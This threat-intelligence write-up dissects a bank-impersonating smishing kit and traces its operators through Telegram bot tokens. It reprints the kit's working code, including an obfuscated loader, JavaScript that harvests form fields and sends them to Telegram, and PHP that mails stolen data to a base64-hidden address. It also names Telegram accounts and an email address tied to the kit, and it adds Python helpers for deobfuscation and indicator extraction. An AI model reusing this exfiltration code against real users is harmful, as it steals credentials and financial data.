Introduction
Account Takeover Fraud (ATO) occurs when cyber criminals gain unauthorized access to a victim’s accounts. Commonly, this happens as a result of phishing, social engineering, data breach, or malware. Criminals may target a variety of accounts including eCommerce, social media, and financial services, often with the goal of financial gain. In 2024, according to the Veriff Fraud Report 2025, ATO fraud increased 13% over 2023.
When carrying out phishing campaigns, cyber criminals will often utilize phishing kits to simplify the process. These are collections of resources and tools that ease the deployment process, effectively lowering the barrier to entry, enabling less technical individuals to launch attacks. Often, these kits contain spoofed login pages and the scripts needed to receive stolen data, including credentials and personally identifiable information (PII). In recent years, according to IBM, technology brands such as Microsoft and Google have been the most targeted, followed by financial services such as Visa and Mastercard.
A real-world example of ATO fraud that I recently uncovered involves the use of a lesser known phishing kit, operated by a smaller group of individuals. This group has primarily impersonated financial institutions, including banks and credit unions. Customers of these financial institutions have been targeted by smishing attempts, often claiming a recent, large transaction has occurred, and providing a URL to a spoofed login page. Several sample messages are included below.
<FI Name>: Two charges total of $780.99? Visit <Phishing URL> to approve or deny.
FRM: <FI Name> MSG: A $499.98 transaction has been made on your ac***t at Bestbuy. If this wasn’t you, hit <Phishing URL> to cancel
Phishing Site Analysis
After the initial phishing page is loaded, the script below is executed, which attempts to fetch the Wikipedia logo. If this request is unsuccessful, a “No Internet” message is displayed to the user.
// Connectivity check run on page load: fetch a Wikipedia asset and, if the
// request fails, show the kit's "No Internet" overlay.
const checkOnlineStatus = async () => {
  try {
    const online = await fetch(
      "https://www.wikipedia.org/portal/wikipedia.org/assets/img/[email protected]"
    );
    return online.status >= 200 && online.status < 300;
  } catch (err) {
    return !1; // minified `false`
  }
};
window.addEventListener("load", async (event) => {
  const online = await checkOnlineStatus();
  if (!online || !navigator.onLine) {
    document.querySelector(".no-internet-wrap").style.display = "flex";
  }
});
In addition to the script above, jQuery is requested from Cloudflare CDN, and the obfuscated script below is executed.
var _0x531869 = _0x58e1;
(function (_0x400469, _0x46af74) {
var _0xcdd89d = _0x58e1,
_0x43fcda = _0x400469();
while (!![]) {
try {
var _0x5a039b =
parseInt(_0xcdd89d(0xf5)) / (0x1bc9 + -0xea7 + -0xd21) +
(-parseInt(_0xcdd89d(0xf9)) / (-0x9 * 0x65 + -0x1226 + 0x15b5)) *
(parseInt(_0xcdd89d(0x109)) /
(0x12a * 0x2 + -0x1ed3 * -0x1 + 0xca * -0x2a)) +
-parseInt(_0xcdd89d(0xfb)) / (-0x23d + -0x4 * 0x7b9 + 0x2125) +
parseInt(_0xcdd89d(0xf3)) / (0x2090 + 0x1459 + -0x34e4) +
(parseInt(_0xcdd89d(0x104)) / (-0x1 * -0x22f3 + -0x112b + -0x11c2)) *
(-parseInt(_0xcdd89d(0xfd)) / (0x3f * 0x49 + 0x26e6 + -0x38d6)) +
(parseInt(_0xcdd89d(0x105)) /
(0x217b * -0x1 + -0x1 * -0x9d2 + -0x17b1 * -0x1)) *
(parseInt(_0xcdd89d(0xfa)) /
(0x976 * -0x2 + -0xc4b * -0x2 + -0x5a1 * 0x1)) +
parseInt(_0xcdd89d(0x103)) /
(-0x679 * 0x3 + -0x23ae * 0x1 + -0x5 * -0xb07);
if (_0x5a039b === _0x46af74) break;
else _0x43fcda["push"](_0x43fcda["shift"]());
} catch (_0x593e89) {
_0x43fcda["push"](_0x43fcda["shift"]());
}
}
})(_0x5f42, 0x11 * 0x2c6b + -0xbbdf * 0x2 + -0x6 * -0x23f),
$(document)[_0x531869(0xf2)](function () {
var _0x439367 = _0x531869,
_0x2e99aa = {
RKNGp: _0x439367(0x107),
imnJz: _0x439367(0xf0),
UuuYx: _0x439367(0xf1),
gZPlR: function (_0x238482, _0x5436b0) {
return _0x238482 + _0x5436b0;
},
MkvBX: _0x439367(0x108) + _0x439367(0xfc) + _0x439367(0x106),
};
if (navigator[_0x439367(0x100)]) {
var _0x1a4789 = _0x2e99aa[_0x439367(0xf4)];
$[_0x439367(0xf6)](
_0x2e99aa[_0x439367(0xf8)](_0x1a4789, _0x2e99aa[_0x439367(0xfe)]),
function (_0x5b76e6, _0x658d76) {
var _0x51f265 = _0x439367;
document[_0x51f265(0xff)](
_0x2e99aa[_0x51f265(0xf7)],
_0x2e99aa[_0x51f265(0x10a)]
),
document[_0x51f265(0x101)](_0x5b76e6),
document[_0x51f265(0x102)]();
}
);
}
});
function _0x58e1(_0x7cd800, _0x339e6d) {
var _0x3dcaea = _0x5f42();
return (
(_0x58e1 = function (_0x367c98, _0x1d1a61) {
_0x367c98 = _0x367c98 - (0x2d5 * -0x5 + -0x1c3a * 0x1 + 0x2b53);
var _0xfa2a21 = _0x3dcaea[_0x367c98];
return _0xfa2a21;
}),
_0x58e1(_0x7cd800, _0x339e6d)
);
}
function _0x5f42() {
var _0x8ba2c2 = [
"116056eSFiLT",
"?_do=layou",
"7nZMiso",
"MkvBX",
"open",
"onLine",
"write",
"close",
"808310iFofJc",
"421662pIdshq",
"273256lkMWcy",
"t&pv=*****",
"text/html",
"_sysm_.php",
"589698jNbYsn",
"imnJz",
"replace",
"spgbuck/",
"ready",
"504055xSWqRT",
"UuuYx",
"180625JizLdt",
"post",
"RKNGp",
"gZPlR",
"2befZgY",
"9KYeBbJ",
];
_0x5f42 = function () {
return _0x8ba2c2;
};
return _0x5f42();
}
Running the script through an online deobfuscation tool produces the script below. It makes a POST request to spgbuck/_sysm_.php with two query parameters: _do and pv. The first has the value layout; the second is commonly the impersonated FI's name or acronym, reversed. The response body is then written over the current DOM with document.open, document.write, and document.close.
$(document).ready(function () {
if (navigator.onLine) {
$.post("spgbuck/_sysm_.php?_do=layout&pv=*****", function (_0x5b76e6, _0x658d76) {
document.open("text/html", "replace");
document.write(_0x5b76e6);
document.close();
});
}
});
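To make the decoding step reproducible without an online tool, here is an added Python script that is not part of the original page or the kit. It takes the string array from the obfuscated block above, recomputes the hex arithmetic (the 0xf0 index base and the checksum target), rotates the array exactly as the kit's self-check loop does, and then resolves the same indices the deobfuscated script uses. The parseInt emulation and all function names are this example's own.

```python
import re

# String array copied from the _0x5f42() function in the obfuscated script above
# ("*****" is the page's own redaction of the pv value).
STRINGS = [
    "116056eSFiLT", "?_do=layou", "7nZMiso", "MkvBX", "open", "onLine", "write",
    "close", "808310iFofJc", "421662pIdshq", "273256lkMWcy", "t&pv=*****",
    "text/html", "_sysm_.php", "589698jNbYsn", "imnJz", "replace", "spgbuck/",
    "ready", "504055xSWqRT", "UuuYx", "180625JizLdt", "post", "RKNGp", "gZPlR",
    "2befZgY", "9KYeBbJ",
]

# The hex arithmetic in the obfuscated code evaluates to these constants:
# _0x58e1 subtracts 0xf0 from every index, and the while(!![]) loop rotates the
# array until the checksum equals 0x11*0x2c6b + -0xbbdf*0x2 + -0x6*-0x23f.
INDEX_BASE = 0xF0
TARGET = 0x11 * 0x2C6B + -0xBBDF * 0x2 + -0x6 * -0x23F  # 100567


def js_parse_int(s: str) -> int:
    """Mimic JavaScript parseInt(): leading integer, otherwise NaN (raised here)."""
    m = re.match(r"\s*[+-]?\d+", s)
    if not m:
        raise ValueError(f"parseInt({s!r}) is NaN")
    return int(m.group())


def checksum(arr):
    """The arithmetic from the obfuscated loop, with the constant divisors
    (which evaluate to 1..10) already simplified."""
    g = lambda i: js_parse_int(arr[i - INDEX_BASE])
    return (
        g(0xF5) / 1
        + (-g(0xF9) / 2) * (g(0x109) / 3)
        + -g(0xFB) / 4
        + g(0xF3) / 5
        + (g(0x104) / 6) * (-g(0xFD) / 7)
        + (g(0x105) / 8) * (g(0xFA) / 9)
        + g(0x103) / 10
    )


def unshuffle(strings, target):
    """Rotate the array (push(shift())) until the checksum matches, exactly as
    the obfuscated IIFE does; return (rotated_array, rotations)."""
    arr = list(strings)
    for k in range(len(arr)):
        try:
            if checksum(arr) == target:
                return arr, k
        except ValueError:
            pass  # NaN never equals the target in JS; keep rotating
        arr.append(arr.pop(0))
    raise RuntimeError("no rotation satisfies the checksum")


def resolve(index_hex: int, rotated):
    """Equivalent of _0x531869(0x...) once the array has been rotated."""
    return rotated[index_hex - INDEX_BASE]


def decode_layout_request():
    """Rebuild the $.post() call from the deobfuscated script."""
    rotated, _ = unshuffle(STRINGS, TARGET)
    s = lambda i: resolve(i, rotated)
    uuu_yx = s(0xF1)                          # "spgbuck/"
    mkv_bx = s(0x108) + s(0xFC) + s(0x106)    # "_sysm_.php?_do=layout&pv=*****"
    return {
        "event": s(0xF2),                     # "ready"
        "online_check": "navigator." + s(0x100),
        "method": s(0xF6),                    # "post"
        "url": uuu_yx + mkv_bx,
        "dom_overwrite": [s(0xFF), s(0x101), s(0x102)],  # open, write, close
    }


if __name__ == "__main__":
    for key, value in decode_layout_request().items():
        print(f"{key}: {value}")
```

The same approach works for any javascript-obfuscator output of this style: copy the string array and the checksum expression, evaluate the constant arithmetic, and rotate until the self-check passes; the index base is whatever the accessor function subtracts.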
The new DOM includes the impersonated login page, as well as several additional scripts. While one of these scripts is obfuscated, the others are nicely formatted and conveniently contain comments.
Although there appear to be several variations of this phishing kit, they share a common set of HTTP requests. Specifically, these requests are made to spgbuck/_sysm_.php, relative to the phishing page. This unique path is an important detail specific to this phishing kit that will later be helpful in identifying additional phishing sites using the same kit.
Before deobfuscating the first script, there are several interesting things that immediately stand out in the other scripts. There are a number of basic functions defined for validating user input, parsing URL parameters, encoding data, and managing cookies. The comments, function names, and strings provide a lot of insight as to what information may be collected from the victim. Several functions also appear to reference Amazon, USPS, and Microsoft 365.
Potentially collected information includes:
- Credentials (username, password)
- Full name
- Mother’s maiden name
- Date of birth
- Social security number
- Email address
- Phone number
- Address (street address, city, state, zip)
- Credit card / debit card (card number, expiration date, security code)
- ATM PIN
- Driver’s license number
- Email credentials (address, password)
- One-time password (OTP)
There is one notable function, vt, that makes a GET request to spgbuck/_sysm_.php with two query parameters: _do and s. Based on the function definition and its usage, this appears to report the user's current step to the server. For instance, this function is called when the login form is first loaded, and whenever information is submitted (i.e., email_first_submit, user_pass_submit, cc_info, etc.).
// Reports the victim's current step: s = base64(location.href + "_" + step)
function vt(pg_step_name) {
  $.get(
    window.hstUrl +
      "_sysm_.php?_do=vt&s=" +
      window.btoa(window.location.href + "_" + pg_step_name),
    function (data) {
      console.log("Logged: " + pg_step_name);
      console.log("Retured Data: " + data);
    }
  );
}
...
// Log Visit
vt('first_visit');
The server always responds to these vt requests with the text Logged in file Bro. vtl.txt. With a little bit of guessing, this file can be found at spgbuck/vtl.txt. It appears to be a visitor log containing the IP, referer, date and time, user agent, and requested URL (which includes the user's current step in a base64 encoded string).
Deobfuscating the first script reveals the use of the Telegram bot API to send messages containing details about the victim, such as their IP address and user agent, as well as the phishing URL and submitted form data, which may include any of the previously mentioned information. Additionally, this script may upload a user-provided photo to Telegram; however, the referenced upload element does not appear to exist.
The Telegram bot authorization tokens and chat IDs found in this script can be used to gather additional information using the Telegram bot API. This analysis is discussed in the next section.
// Runs only when the page has set window.hapei and window.ceid.
$(document).ready(function () {
  if (window.hapei && window.ceid) {
    var _0x18e690 = '';
    // Victim's public IP, looked up asynchronously; it may still be empty
    // if a form is submitted before the lookup returns.
    $.getJSON("https://api.ipify.org?format=json", function (_0x1f7ce4) {
      console.log("IP: " + _0x1f7ce4.ip);
      _0x18e690 = _0x1f7ce4.ip;
    });
    // Captures every input's latest value on each input event, keyed by its name attribute.
    var _0x30352b = {};
    $(":input").on("input", function (_0x1452ed) {
      var _0x4d6b13 = $(this);
      var _0x23d7e9 = _0x4d6b13.attr("name");
      _0x30352b[_0x23d7e9] = _0x4d6b13.val();
    });
    $("form").on("submit", function (_0x106231) {
      console.log("Submit Observed", Object.keys(_0x30352b).length);
      if (Object.keys(_0x30352b).length > 0) {
        var _0x26a839 = JSON.stringify(_0x30352b);
        // Two message bodies: the copy for the hard-coded channel also carries the phishing URL.
        var _0x4cd41d = "====== XXX INFO ======\r\nURL:" + window.location.href + "\r\nIP: https://ip-api.com/" + _0x18e690 + "\r\nUser-Agent: " + navigator.userAgent + "\r\nData:\r\n " + _0x26a839 + "\r\n======";
        _0x26a839 = "====== XXX INFO ======\r\nIP: https://ip-api.com/" + _0x18e690 + "\r\nUser-Agent: " + navigator.userAgent + "\r\nData:\r\n " + _0x26a839 + "\r\n======";
        console.log("Form ID: " + $(this).attr('id'));
        console.log("Form Data: " + JSON.stringify(_0x30352b));
        console.log("TG Data: " + _0x26a839);
        // First copy: the operator's bot and chat (token and chat id redacted).
        $.ajax({
          'url': "https://api.telegram.org/bot<token>/sendMessage",
          'method': "GET",
          'data': {
            'chat_id': '<chat id>',
            'text': _0x26a839
          },
          'dataType': "jsonp",
          'success': function (_0x1c5f67) {
            console.log("TGB... :;)");
          }
        });
        // Second copy: hard-coded channel -1002143942473, which is not part of the operator's configuration.
        $.ajax({
          'url': "https://api.telegram.org/bot<token>/sendMessage",
          'method': "GET",
          'data': {
            'chat_id': "-1002143942473",
            'text': _0x4cd41d
          },
          'dataType': "jsonp",
          'success': function (_0x31b84a) {
            console.log("X3TGB... :;)");
          }
        });
      }
      // Optional photo upload via sendPhoto; the .js-drop-target element was not present on the observed pages.
      if ($(".js-drop-target").is(":visible")) {
        jQuery.each($(".js-drop-target"), function (_0x1548c9, _0x701fe2) {
          var _0x2df66c = $(this).find(".js-upload-file-input");
          var _0x1d41c3 = _0x2df66c.get(0).files[0];
          if (_0x1d41c3) {
            var _0x2600d3 = new FormData();
            _0x2600d3.append("chat_id", '<chat id>');
            _0x2600d3.append("photo", _0x1d41c3);
            _0x2600d3.append("caption", _0x18e690);
            $.ajax({
              'url': "https://api.telegram.org/bot<token>/sendPhoto",
              'method': "POST",
              'data': _0x2600d3,
              'async': true,
              'contentType': false,
              'cache': false,
              'processData': false,
              'success': function (_0xd9d2f7) {
                console.log("TGB-IMG... :;)");
              }
            });
            var _0xcf0015 = new FormData();
            _0xcf0015.append("chat_id", "-1002143942473");
            _0xcf0015.append("photo", _0x1d41c3);
            _0xcf0015.append("caption", _0x18e690 + " (" + window.location.href + ')');
            $.ajax({
              'url': "https://api.telegram.org/bot<token>/sendPhoto",
              'method': "POST",
              'data': _0xcf0015,
              'async': true,
              'contentType': false,
              'cache': false,
              'processData': false,
              'success': function (_0x4882b7) {
                console.log("X3TGBIMG... :;)");
              }
            });
          }
        });
      }
    });
  }
});
In addition to sending the form data via Telegram, it is also submitted to spgbuck/_sysm_.php via a POST request with the query parameter _do=ucfbr_form.
By submitting data to the phishing site, the resulting form submission and Telegram API requests can be seen using the browser developer tools. Several of these requests can be seen below.
After submitting data to all forms, the page will redirect to a predefined URL, which is typically the FI’s official login page.
Telegram Bot API Analysis
Using the Telegram bot authorization tokens and chat IDs that were found during the previous analysis, a wealth of other information can be collected about the Telegram bots and users associated with them.
The client-side JavaScript of the phishing sites uses only two API methods: sendMessage and sendPhoto. The Telegram bot API documentation provides a list of additional methods.
As explained in the documentation, API requests require the bot's unique authorization token as well as the name of the method to invoke. Many methods also require additional parameters, which can be provided in several ways, such as URL query parameters or a JSON body. For testing purposes, curl can be used to call the desired methods manually.
curl 'https://api.telegram.org/bot<token>/<method>?<param1>=<value>&<param2>=<value>' > response.json
The sample responses below were obtained manually using the most frequently observed token and chat ID; the Automated Analysis section describes how the same details are gathered for every extracted token to generate and update the related attribution graph.
Based on the analysis in this section, the general flow of messages from the phishing site to the associated Telegram user can be visualized as in the following graph.
getMe Method
The getMe API method returns basic information about the bot such as its ID, name, and username.
{
"ok": true,
"result": {
"id": 7117374271,
"is_bot": true,
"first_name": "Komando",
"username": "KomandozBot",
"can_join_groups": true,
"can_read_all_group_messages": false,
"supports_inline_queries": false,
"can_connect_to_business": false,
"has_main_web_app": false
}
}
getChat Method
The getChat method returns information about a chat. The chat may be a private chat, a group, or a channel. The information returned in this response will vary depending on the type of chat. For example, if the chat is a group or channel, the response may include the chat's title and description. If the chat is a private chat, the response may include the user's name, username, and bio.
{
"ok": true,
"result": {
"id": -1002143942473,
"title": "Komandoz",
"type": "channel",
"invite_link": "https://t.me/+***",
"has_visible_history": true,
"can_send_paid_media": true,
"available_reactions": [],
"max_reaction_count": 11,
"accent_color_id": 1
}
}
getChatAdministrators Method
The getChatAdministrators method returns a list of users which are administrators in a chat. This method only applies to groups and channels. In this instance, the response from the getChat method indicates this is a channel, so at least one administrator is expected. The entry with status creator is the non-bot user who owns the channel, which is the most useful attribution point in the response.
{
"ok": true,
"result": [
{
"user": {
"id": 7117374271,
"is_bot": true,
"first_name": "Komando",
"username": "KomandozBot"
},
"status": "administrator",
"can_be_edited": false,
"can_manage_chat": true,
"can_change_info": true,
"can_post_messages": true,
"can_edit_messages": true,
"can_delete_messages": true,
"can_invite_users": true,
"can_restrict_members": true,
"can_promote_members": false,
"can_manage_video_chats": true,
"can_post_stories": true,
"can_edit_stories": true,
"can_delete_stories": true,
"is_anonymous": false,
"can_manage_voice_chats": true
},
{
"user": {
"id": 6493752618,
"is_bot": false,
"first_name": "SSL",
"last_name": "Monks",
"username": "qodeninja",
"language_code": "en"
},
"status": "creator",
"is_anonymous": false
}
]
}
getUserProfilePhotos Method
The getUserProfilePhotos method returns a list of profile pictures when provided with a user_id. The returned file_id can be used with the getFile method to download the file.
{
"ok": true,
"result": {
"total_count": 1,
"photos": [
[
{
"file_id": "AgACAgQAAxUAAWcZFrNUP8qMBGqbJoHtv_9kSy_XAAKmwTEb7dhZUXsTyMRfiYr5AQADAgADYQADNgQ",
"file_unique_id": "AQADpsExG-3YWVEAAQ",
"file_size": 5607,
"width": 160,
"height": 160
},
{
"file_id": "AgACAgQAAxUAAWcZFrNUP8qMBGqbJoHtv_9kSy_XAAKmwTEb7dhZUXsTyMRfiYr5AQADAgADYgADNgQ",
"file_unique_id": "AQADpsExG-3YWVFn",
"file_size": 10790,
"width": 320,
"height": 320
},
{
"file_id": "AgACAgQAAxUAAWcZFrNUP8qMBGqbJoHtv_9kSy_XAAKmwTEb7dhZUXsTyMRfiYr5AQADAgADYwADNgQ",
"file_unique_id": "AQADpsExG-3YWVEB",
"file_size": 31420,
"width": 640,
"height": 640
}
]
]
}
}
getFile Method
The getFile method returns a file_path when provided a file_id. The file_path can then be used to download the file from https://api.telegram.org/file/bot<token>/<file_path>.
{
"ok": true,
"result": {
"file_id": "AgACAgQAAxUAAWcZFrNUP8qMBGqbJoHtv_9kSy_XAAKmwTEb7dhZUXsTyMRfiYr5AQADAgADYwADNgQ",
"file_unique_id": "AQADpsExG-3YWVEB",
"file_size": 31420,
"file_path": "photos/file_0"
}
}
The downloaded profile photo for this user, @qodeninja, can be seen below.
Phishing Kit Analysis
While a lot of information can be obtained from analyzing active phishing sites, even more can be uncovered by obtaining the phishing kit source code, which may include hard coded secrets and the location of log files, as well as additional functionality that may not be revealed by the client-side code.
After reading about several techniques for finding and downloading phishing kits in a post by Bradley Kemp of Phish Report, I was eventually able to obtain a sample of the phishing kit used by one of the previously analyzed sites. Although finding a phishing site with directory listing enabled would have been ideal, a lucky guess yielded a zip file containing the kit's PHP source code. The directory structure of this phishing kit can be seen below.
<FI related name>
├── index.html
├── <reverse FI name/acronym>-favicon.ico
└── spgbuck
├── _abt.php # antibot; disallowed keywords and ip addresses
├── _evm_html.php # email verification modal html
├── _evm_js.php # email verification modal javascript
├── _inps.php # inputs; label, type, class, icon class, maxlength
├── _spmlr_.php # PHPMailer
├── _sysm_.php # main script
├── css_sulpknab.php # FI related css
├── files
│ ├── [email protected] # FI logo
│ └── index.html
├── index.html
├── js_common.php # common javascript
├── js_sulpknab.php # FI related javascript
├── othermails.png
├── pg_<reverse FI name/acronym>.php # FI specific phishing page
├── robots.txt
├── uploads
│ └── index.html
├── vtl.txt # log file containing visitor information and current step
└── xxx.txt # log file containing submitted credentials and information
4 directories, 20 files
Many of the files found in this sample contain code that was already reviewed during the Phishing Site Analysis. The most notable file in this sample is spgbuck/_sysm_.php. This appears to be the main PHP script; it contains the configuration options, logging functionality, file upload processing, email and Telegram exfiltration, and the various actions that can be performed, selected via the _do query parameter.
The configuration section at the start of spgbuck/_sysm_.php, seen below, contains helpful comments explaining what each option does. Interestingly, this section defines only a single Telegram bot token and chat ID. A second token and chat ID, the ones used during the Telegram Bot API Analysis, are already embedded in the obfuscated JavaScript. The user associated with this second token and chat ID could very likely be the phishing kit author.
In another interesting post from Phish Report, Anshuman Das analyzes a free phishing kit that uses similar obfuscation techniques to steal the Telegram tokens of the scammers who configured it. Although this particular kit does not appear to steal any tokens, it does share collected credentials and other PII with an additional Telegram user who was not configured by the phishing kit operator.
$send = "[email protected]"; // change ur email
$logfile = 1; // 1 = log data, 0 = do not log data
$log_to_tg = 1; // 1 = log data to tg, 0 = do not log data to tg
$run_cn_c = 0;
$run_antibot = 1; // 1 = enable antibot, 0 = disable antibot
/* ---- FORM-ACTIONS-CONFIG ---- */
$my_form_actions = [];
/* ---- */
/*
pg002 - OTP
pg003 - Personal Details
pgEmail - Email Access
pgDone - Finish
pgQnA - Security Question and Answer
pgCCv - Card Data
*/
$my_form_actions['form1'] = 'pg002';
$my_form_actions['form2'] = 'pgDone';
$my_form_actions['form3'] = 'pgEmail';
$my_form_actions['form_ccv'] = 'pg003';
$my_form_actions['form_qna'] = 'pg003';
/*--------------------------- DO NOT CHANGE ANYTHING BELOW EXCEPT YOU KNOW WHAT YOU ARE DOING. ---------------------------------- */
$auto_check_login = 1; // 1 - check true login, 0 - do not check true login.
$grab_fake_logins = 1; // 1 - grab fake logins, 0 - do not grab fake logins.
$auto_grab_profile = 1; //1 = grabs email domain profile (icon,bg), 0 = skip email domain profile grabing.
$show_profile_icon = 1; // 1 = show email domain icon, 0 = hide email domain icon.
$show_profile_bg = 1; // 1 = show email domain bg, 0 = hide email domain bg.
$allow_email_verify = 1;
$show_singin_opt = 0;
$show_mesg_b4_pswd = 1; // Tips: Because you're accessing sensitive info, you need to verify your password
$grab_all_fields = 1;
$pass_submit_count = 1; // 1 - once, 2 - Twice.
$tg_haypi = '<telegram bot token>';
$tg_ceid = '<telegram chat id>';
/* ---------------- XXX-MJ ------------------------*/
$disHost = 'https://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['PHP_SELF']).'/';
$ip = getenv("REMOTE_ADDR"); //getip(); //
$svr_host = str_replace('www.', '', $_SERVER['HTTP_HOST']);
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$_SESSION['allowed_fields'] = array('login','passwd');
$allowed_fields = array('login','passwd');
$all_alpha_digits = [];
$visit_log_file = 'vtl.txt';
$visit_limit = 3;
$visit_limit_step = 'email_second_submit';//cc_info_submit,email_second_submit,email_form,(second_login_submit|user_pass_submit)
if($run_antibot){ include '_abt.php'; }
$redirect_to_url = '<FI login page>';
$redirect_to_name ='<FI name>';
One notable function in spgbuck/_sysm_.php is mj_do_mail. Besides the operator-configured $send address, it mails every message to a second, base64 encoded address, amFwbWVqYXBtZUB5YWhvby5jb20=, which decodes to japmejapme@yahoo.com.
function mj_do_mail($message) {
  global $send, $ip, $svr_host;
  $subject = "TRU8T1F6U 8ERVIC5 - $ip";
  $headers = "From: TRU8T1F6UAlerts <customercare@$svr_host>\r\n";
  $headers .= "MIME-Version: 1.0\r\n";
  /*@mail($send.','.base64_decode('amFwbWVqYXBtZUB5YWhvby5jb20='),$subject,$message,$headers);*/
  // First copy to the operator-configured address ...
  @mail($send, $subject, $message, $headers);
  // ... and a second copy to the base64-hidden address the operator never configured.
  @mail(base64_decode('amFwbWVqYXBtZUB5YWhvby5jb20='), $subject, $message, $headers);
  /*testing*/
}
During the Phishing Site Analysis, only a few different values were observed for the _do query parameter. Analyzing spgbuck/_sysm_.php gives the complete list of possible values, described below. This reveals functionality that was previously unknown, such as the ability to delete the credential log file and to upload files to the server. Knowing the name and path of the credential log file also shows that it is publicly accessible, which makes it possible for impersonated financial institutions to proactively identify and secure compromised customer accounts before any fraudulent activity occurs.
- layout - Returns the appropriate page view for the victim's current step
- verify_email - Attempts to get the logo and background associated with the provided email's M365 tenant
- 8p8u_form, ucfbr_form, same_form - Logs submitted form data to file (spgbuck/xxx.txt), email, and Telegram
- cnc - Checks if spgbuck/_cnc.php exists (this file does not exist in this sample) and creates a dvcs directory containing an empty index.html file
- form1, form2, form3, form4, form5, xxx_form - If the auto_check_login option is configured, attempts to authenticate to smtp.office365.com using the submitted credentials; logs submitted form data to file (spgbuck/xxx.txt), email, and Telegram
- vt - Logs visit information, including the current step passed in the s parameter
- visits - Displays a nicely formatted version of spgbuck/vtl.txt that automatically refreshes every 5 seconds
- rlf - Deletes the credential log file (spgbuck/xxx.txt)
Automated Analysis
Applying the insights gained from the previous analysis, additional phishing sites can be found using urlscan.io. For instance, the path segment spgbuck appears to be unique to this phishing kit. Searching urlscan.io with the query filename:spgbuck currently yields 354 scans in which this term appears in at least one request URL.
Using a script, these search results can be programmatically fetched using the search API. Next, using regular expressions, any Telegram tokens and chat IDs contained within the DOM of each scan can be extracted and appropriately associated with the scan from which they were found. Finally, the extracted Telegram tokens and chat IDs can be used with the Telegram bot API to gather additional details about the related bots, chats, and users.
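Added Python example, not part of the original page or the author's tooling, covering two pieces of the analysis above: decoding the s parameter of the kit's vt requests (base64 of href + "_" + step, described in the Phishing Site Analysis) and the extraction step just described, pulling Telegram bot tokens and chat IDs out of a scan's DOM and preparing the bot API lookups. The scan record, the domain fi-login.example, the scan ID, and the bot token are constructed placeholders; the kit path, the _do actions, the step names, and the hard-coded channel ID -1002143942473 come from the analysis above. Fetching from the urlscan.io search API is left out so the block runs offline.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Indicators taken from the analysis above.
KIT_PATH = "spgbuck/_sysm_.php"
EMBEDDED_CHAT_ID = "-1002143942473"  # channel hard-coded in the kit's JS, not set by the operator
KNOWN_STEPS = ("first_visit", "email_first_submit", "email_second_submit", "user_pass_submit",
               "second_login_submit", "cc_info_submit", "cc_info", "email_form")

# Bot tokens are "<bot id>:<35 url-safe chars>" and appear after "api.telegram.org/bot".
TOKEN_RE = re.compile(r"api\.telegram\.org/bot(\d{8,10}:[A-Za-z0-9_-]{35})")
# Matches both {'chat_id': '-100...'} and FormData .append("chat_id", "-100...").
CHAT_ID_RE = re.compile(r"chat_id[\"']?\s*[:,=]\s*[\"']?(-?\d{5,20})")
TG_API = "https://api.telegram.org/bot{token}/{method}"


def split_vt(decoded):
    """vt logs btoa(location.href + "_" + step); recover (href, step)."""
    for step in sorted(KNOWN_STEPS, key=len, reverse=True):
        if decoded.endswith("_" + step):
            return decoded[: -len(step) - 1], step
    # Unknown step: assume the href has no "_" after its last "/".
    head, _, tail = decoded.rpartition("/")
    href, _, step = tail.partition("_")
    return head + "/" + href, step


def kit_requests(urls):
    """Classify every request URL that hits the kit's main script."""
    hits = []
    for u in urls:
        p = urlparse(u)
        if not p.path.endswith("/" + KIT_PATH):
            continue
        q = parse_qs(p.query)
        do = q.get("_do", [""])[0]
        entry = {"url": u, "action": do}
        if do == "vt" and "s" in q:
            # parse_qs turns "+" into " "; btoa output may contain "+".
            raw = q["s"][0].replace(" ", "+")
            decoded = base64.b64decode(raw).decode("utf-8", "replace")
            entry["page"], entry["step"] = split_vt(decoded)
        hits.append(entry)
    return hits


def telegram_indicators(dom):
    """Pull bot tokens and chat IDs out of a scanned page's DOM."""
    tokens = sorted(set(TOKEN_RE.findall(dom)))
    chats = sorted(set(CHAT_ID_RE.findall(dom)))
    methods = ("getMe", "getChat", "getChatAdministrators")
    return {
        "tokens": tokens,
        "chat_ids": chats,
        "author_channel_present": EMBEDDED_CHAT_ID in chats,
        # URLs for the enrichment step (add ?chat_id=... for the getChat* methods).
        "lookups": [TG_API.format(token=t, method=m) for t in tokens for m in methods],
    }


def analyze_scan(scan):
    """One urlscan-style record -> kit match plus extracted attribution data."""
    hits = kit_requests(scan["requests"])
    result = {"scan_id": scan["id"], "kit_match": bool(hits), "requests": hits}
    if hits:
        result.update(telegram_indicators(scan["dom"]))
    return result


# --- constructed sample scan; domain, scan id and token are placeholders, not real data ---
FAKE_TOKEN = "1234567890:AAExampleTokenExampleTokenExample01"
_vt_s = base64.b64encode(b"https://fi-login.example/_first_visit").decode()
SAMPLE_SCAN = {
    "id": "00000000-0000-0000-0000-000000000000",
    "requests": [
        "https://fi-login.example/",
        "https://fi-login.example/spgbuck/_sysm_.php?_do=layout&pv=knab",
        "https://fi-login.example/spgbuck/_sysm_.php?_do=vt&s=" + _vt_s,
        "https://fi-login.example/spgbuck/_sysm_.php?_do=ucfbr_form",
        "https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js",
    ],
    "dom": (
        "$.ajax({'url': \"https://api.telegram.org/bot" + FAKE_TOKEN + "/sendMessage\", "
        "'data': {'chat_id': '-1009999999999', 'text': t}});"
        "fd.append(\"chat_id\", \"-1002143942473\");"
    ),
}

if __name__ == "__main__":
    import json
    print(json.dumps(analyze_scan(SAMPLE_SCAN), indent=2))
```

When this runs over real urlscan.io results, each scan's request list and DOM come from the result API, and the lookups list is what gets passed to curl or requests for getMe, getChat, and getChatAdministrators; the author_channel_present flag separates operator-configured chats from the channel that every copy of the kit reports to.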
All of the collected information is stored in a relational database, making it trivial to build associative connections between specific phishing sites and the Telegram users which ultimately receive credentials and other information from them. These relationships can be viewed in an interactive attribution graph. Clicking a specific node will display its related details.